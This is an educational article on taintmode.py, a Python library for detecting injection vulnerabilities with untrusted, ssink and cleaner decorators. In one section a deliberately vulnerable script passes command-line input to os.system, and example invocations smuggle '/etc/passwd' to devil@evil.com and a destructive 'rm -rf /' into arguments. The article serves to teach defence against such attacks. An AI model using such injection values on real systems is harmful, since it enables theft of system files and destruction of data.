--------------------
Taint Mode in Python
--------------------

.. class:: endnote

+-------------------------------------------+-------------------------------------------+
| .. image:: ../taint/juanjodetraje.jpg     |**Author:** Juanjo Conti                   |
|    :class: right foto                     |                                           |
|                                           |Juanjo is an Information Systems Engineer. |
|                                           |He has been coding in Python for the last  |
|                                           |5 years and uses it for work, research and |
|                                           |fun.                                       |
|                                           |                                           |
|                                           |**Blog:** http://juanjoconti.com.ar        |
|                                           |                                           |
|                                           |**Email:** jjconti@gmail.com               |
|                                           |                                           |
|                                           |**Twitter:** @jjconti                      |
|                                           |                                           |
|                                           |                                           |
|                                           |                                           |
|                                           |                                           |
+-------------------------------------------+-------------------------------------------+

This article is based on the paper *A Taint Mode for Python via a Library*, which I wrote with Dr. Alejandro Russo from Chalmers University of Technology (Gothenburg, Sweden) and which was presented at the OWASP App Sec Research 2010 conference.

Opening words
-------------

Vulnerabilities in web applications are a threat to online systems. SQL injection and cross-site scripting (XSS) attacks are among the most common threats found nowadays. These attacks are often the result of improper or non-existent input validation.

To help discover such vulnerabilities, taint analysis has been implemented for popular web scripting languages like Perl, Ruby, PHP, and Python. Such analysis is often implemented as an execution monitor, for which the interpreter has to be adapted to provide a taint mode. However, modifying an interpreter can be a major task in its own right, and each new release of the interpreter is likely to require the same adaptation again.

Unlike previous approaches, taintmode.py provides taint analysis for Python via a library written entirely in Python, thus avoiding any modification of the interpreter. Classes, decorators and dynamic dispatch make our solution lightweight, easy to use, and particularly neat. With little or no effort, the library can be adapted to work with different Python interpreters.

Taint Analysis concepts
-----------------------

First, let's go over the basic concepts.

**Untrusted sources**. Data coming from untrusted sources is marked as tainted. Examples are any data received as a GET or POST parameter, HTTP headers, and AJAX requests. One may also consider marking data from a persistence layer as tainted: a database may have been tampered with outside the application, or the data could have been intercepted and modified in transit.

**Sensitive sinks** are the points in the system that unvalidated data must not reach, because an attack may be hidden in it. Examples of sensitive sinks are the browser or an HTML template engine, SQL, OS or LDAP interpreters, or even the Python interpreter itself.

**Sanitization methods** are the third element in the scene: they allow us to escape, encode or validate input data so that it is fit to be sent to a sink. An example of a sanitization function is Python's cgi.escape:

.. code-block:: pycon

    >>> import cgi
    >>> cgi.escape("<script>alert('this is an attack')</script>")
    "&lt;script&gt;alert('this is an attack')&lt;/script&gt;"

(cgi.escape was removed in Python 3.8; in Python 3 its replacement is html.escape, which by default also escapes quotes.)

How to use it?
--------------

The following example is deliberately simple, so that we can focus on the concepts rather than on the problem itself:

.. code-block:: python

    import sys
    import os

    def get_data(args):
        # Return the email address and the file name given on the command line.
        return args[1], args[2]


    usermail, filename = get_data(sys.argv)
    # Vulnerable on purpose: user input goes straight into a shell command.
    cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    os.system(cmd)

The script receives an email address and a file name as command-line arguments, and sends the file by mail to that address. The problem with this application is that its author did not consider the alternative uses an attacker could try. For example:

.. code-block:: bash

    python email.py alice@domain.se ./reportJanuary.xls
    python email.py devil@evil.com '/etc/passwd'
    python email.py devil@evil.com '/etc/passwd ; rm -rf / '

The first example is the intended use of the application, the one the programmer had in mind when writing it.
The second one shows the first vulnerability: an attacker may send himself the contents of /etc/passwd. The third example is even worse: the attacker not only steals sensitive system information but also erases the system's files. Of course, whether this actually happens depends on how the server is configured and on the privileges the application runs with, but you get the idea.

So... how can the library help the programmer become aware of these problems and fix them? The first step is to import the library's components and to mark the sensitive sinks and the untrusted sources. The modified version of the program is:

.. code-block:: python

    import sys
    import os
    from taintmode import untrusted, ssink, cleaner, OSI

    os.system = ssink(OSI)(os.system)

    @untrusted
    def get_data(args):
        return [args[1], args[2]]


    usermail, filename = get_data(sys.argv)
    cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    os.system(cmd)

Note that we mark the get_data function as an untrusted source (with the untrusted decorator) and os.system as a sink sensitive to Operating System Injection (OSI) attacks. Now, when we run the program (whether or not we are attempting an attack), we get this message on the standard output:

.. code-block:: bash

    $ python email.py jjconti@gmail.com myNotes.txt
    ===============================================================================
    Violation in line 14 from file email.py
    Tainted value: mail -s "Requested file" jjconti@gmail.com < myNotes.txt
    -------------------------------------------------------------------------------
        usermail, filename = get_data(sys.argv)
        cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    --> os.system(cmd)
    ===============================================================================

The library intercepts the execution just before the untrusted datum reaches the sensitive sink, and reports the violation.
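
To give an idea of what such an interception involves, here is a toy sketch of the mechanism in plain Python 3. It is not taintmode.py's code, only an illustration under simplifying assumptions: the names TStr, TaintError, ALL_TAGS, taints_of and fake_system are hypothetical, tags are plain strings, this untrusted only handles strings and lists of strings, and the sink raises an exception instead of printing a report like the one above. fake_system stands in for os.system, so the sketch never runs a shell command.

.. code-block:: python

    import functools

    # Toy sketch, NOT taintmode.py's implementation; tag names are hypothetical strings.
    ALL_TAGS = frozenset({"OSI", "SQLI", "XSS", "II"})


    class TaintError(Exception):
        """Raised by the toy sink when a tainted value reaches it."""


    def taints_of(value):
        """Return the tags carried by value (empty for ordinary objects)."""
        return getattr(value, "taints", frozenset())


    class TStr(str):
        """Toy taint-aware str: a str subclass carrying a set of tags."""

        def __new__(cls, value, taints=()):
            obj = super().__new__(cls, value)
            obj.taints = frozenset(taints)
            return obj

        def __add__(self, other):
            if not isinstance(other, str):
                return NotImplemented
            # Concatenation propagates the union of both operands' tags.
            return TStr(str.__add__(self, other), self.taints | taints_of(other))

        def __radd__(self, other):
            # Called for 'literal' + TStr, so a plain prefix keeps the tags too.
            if not isinstance(other, str):
                return NotImplemented
            return TStr(str.__add__(other, self), self.taints | taints_of(other))


    def untrusted(func):
        """Mark every string returned by func (a str or a list of str) with all tags."""
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            result = func(*args, **kwargs)
            if isinstance(result, str):
                return TStr(result, ALL_TAGS)
            return [TStr(item, ALL_TAGS) for item in result]
        return wrapper


    def ssink(tag):
        """Refuse to call the wrapped function if any argument carries tag."""
        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                for arg in (*args, *kwargs.values()):
                    if tag in taints_of(arg):
                        raise TaintError(f"{tag} violation: {arg!r} reached {func.__name__}")
                return func(*args, **kwargs)
            return wrapper
        return decorator


    @untrusted
    def get_data(args):
        return [args[1], args[2]]


    @ssink("OSI")
    def fake_system(cmd):
        """Stand-in for os.system: just returns the command it was given."""
        return cmd


    usermail, filename = get_data(["email.py", "devil@evil.com", "/etc/passwd ; rm -rf /"])
    cmd = 'mail -s "Requested file" ' + usermail + " < " + filename
    print(sorted(cmd.taints))  # ['II', 'OSI', 'SQLI', 'XSS']

    try:
        fake_system(cmd)  # intercepted: the command carries the OSI tag
    except TaintError as exc:
        print(exc)

    print(fake_system("ls"))  # untainted input passes through: prints ls

Because the tags travel with the string objects themselves, the check can wait until the sink is actually called, and concatenating a literal with a tainted string (handled by __radd__) keeps the taint. A complete taint-aware str would also need to redefine many other methods, such as slicing, join or format, not just concatenation.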

The next step is to add a cleaning function to sanitize the input data:

.. code-block:: python

    import sys
    import os
    from taintmode import untrusted, ssink, cleaner, OSI
    # clean_osi: a function that cleans data against OSI attacks (its code is not shown here).
    from cleaners import clean_osi

    clean_osi = cleaner(OSI)(clean_osi)
    os.system = ssink(OSI)(os.system)

    @untrusted
    def get_data(args):
        return [args[1], args[2]]


    usermail, filename = get_data(sys.argv)
    usermail = clean_osi(usermail)
    filename = clean_osi(filename)
    cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    os.system(cmd)

In this final version we import clean_osi, a function able to clean input data against OSI attacks, and in the next line we mark it as such with the cleaner decorator (the library requires this). Finally, we use the function to clean the program's inputs. If we execute the program now, it runs normally.

How does it work?
-----------------

The library uses identifiers, called tags, for the different kinds of vulnerability you are working with; the examples in this article use OSI, SQLI, XSS and II. It also provides decorators to mark parts of the program (classes, methods or functions) as any of the three elements described in the Taint Analysis concepts section.

untrusted
~~~~~~~~~

untrusted is a decorator indicating that the values returned by a function or method are not to be trusted. Since untrusted values may carry any kind of attack, they are marked as tainted with every kind of stain. If you have access to the function or method definition, for example because it is part of your codebase, the decorator can be applied using Python's syntactic sugar:

.. code-block:: python

    @untrusted
    def from_the_outside():
        ...

When using third-party modules, we can still apply the decorator. The next example comes from a program written with the web.py framework:

.. code-block:: python

    import web
    from taintmode import untrusted

    # Everything web.input() returns (the request parameters) is now tainted.
    web.input = untrusted(web.input)

ssink
~~~~~

The ssink decorator is used to mark the functions or methods that tainted values must not reach; we call them sensitive sinks.
Each sink is sensitive to a particular kind of vulnerability, which must be specified when the decorator is applied. For example, Python's eval function is a sink sensitive to Interpreter Injection (II) attacks. We mark it like this:

.. code-block:: python

    from taintmode import ssink, II

    eval = ssink(II)(eval)

The web.py framework provides examples of sinks sensitive to SQL Injection (SQLI):

.. code-block:: python

    import web
    from taintmode import ssink, SQLI

    # DB_NAME: path to the SQLite database file, defined elsewhere.
    db = web.database(dbn="sqlite", db=DB_NAME)
    db.delete = ssink(SQLI)(db.delete)
    db.select = ssink(SQLI)(db.select)
    db.insert = ssink(SQLI)(db.insert)

As with the other decorators, if the sensitive sink is defined in our own code, we can use syntactic sugar:

.. code-block:: python

    @ssink(XSS)
    def render_answer(input):
        ...

The decorator can also be used without specifying a vulnerability. In that case the sink is marked as sensitive to every kind of vulnerability, although this is not a very common use case:

.. code-block:: python

    @ssink()
    def very_sensitive(input):
        ...

When a value tainted with a given tag reaches a sink sensitive to that tag, we are facing a vulnerability, and an appropriate mechanism is executed, such as the violation report shown earlier.

cleaner
~~~~~~~

cleaner is a decorator used to indicate that a method or function is able to clean stains from a value. For example, the plain_text function removes HTML code from its input and returns the new, clean value:

.. code-block:: pycon

    >>> plain_text("This is <b>bold</b>")
    'This is bold'
    >>> plain_text('Click <a href="http://www.example.com">here</a>')
    'Click here'

Functions of this kind are associated with a particular kind of vulnerability, so the right way to use the cleaner decorator is to specify the kind of stain. Again, there are two ways of doing it. In the definition:

.. code-block:: python

    @cleaner(XSS)
    def plain_text(input):
        ...

or before we start using the function in our program:

.. code-block:: python

    plain_text = cleaner(XSS)(plain_text)

Taint aware
~~~~~~~~~~~

One of the main parts of the library tracks taint information for built-in classes (such as int or str).
The library dynamically defines subclasses of these classes, adding an attribute that makes the tracking possible: for each object, the attribute holds a set of tags representing the taints the object has at a given moment of the execution. An object is considered untainted when its set of tags is empty. In the context of the library, these subclasses are called *taint-aware classes*.

The methods inherited from the built-in classes are redefined so that they propagate taint information. For example, if a and b are tainted objects, c will carry the union of the taints of both:

.. code-block:: python

    # "action" stands for any method of a taint-aware class.
    c = a.action(b)

Present state
-------------

In this brief article I have presented the main characteristics of the library. To learn about more advanced features and other implementation details, you can visit http://www.juanjoconti.com.ar/taint/

More information & links
------------------------

* OWASP App Sec 2010: http://alturl.com/5u94e
* OWASP: http://www.owasp.org
* Python security: http://www.pythonsecurity.org